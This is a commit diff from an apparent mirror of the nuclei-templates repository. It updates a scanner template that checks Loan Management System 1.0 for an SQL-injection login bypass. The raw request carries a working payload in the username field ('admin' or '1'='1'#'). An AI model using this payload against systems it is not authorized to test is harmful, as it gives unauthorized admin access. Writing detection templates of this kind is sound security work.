daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update loancms-sqli.yaml

patch-1
Ritik Chaddha 2022-07-20 18:08:25 +05:30 committed by GitHub
parent 2d71d7a288
commit 8bca76cf6d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 15 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
vulnerabilities/other/loancms-sqli.yaml
View File

@ -3,12 +3,12 @@ id: loancms-sqli
info: info:
name: Loan Management System 1.0 - SQLi Authentication Bypass name: Loan Management System 1.0 - SQLi Authentication Bypass
author: arafatansari author: arafatansari
severity: medium severity: high
reference:
- https://www.exploit-db.com/exploits/50402
description: | description: |
Loan Management System Login page can be bypassed with a simple SQLi to the username parameter. Loan Management System Login page can be bypassed with a simple SQLi to the username parameter.
tags: sqli,bypass,cms reference:
- https://www.exploit-db.com/exploits/50402
tags: loancms,sqli,bypass,cms
requests: requests:
- raw: - raw:
@ -19,18 +19,22 @@ requests:
username=admin'+or+'1'%3D'1'%23&password=nuclei username=admin'+or+'1'%3D'1'%23&password=nuclei
- |
GET /index.php?page=home HTTP/1.1
Host: {{Hostname}}
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- '1' - 'window.start_load'
- 'Welcome back'
- 'Loan Management System'
condition: and
- type: word - type: word
part: header part: body
words: words:
- text/html - 'login-form'
negative: true
- type: status
status:
- 200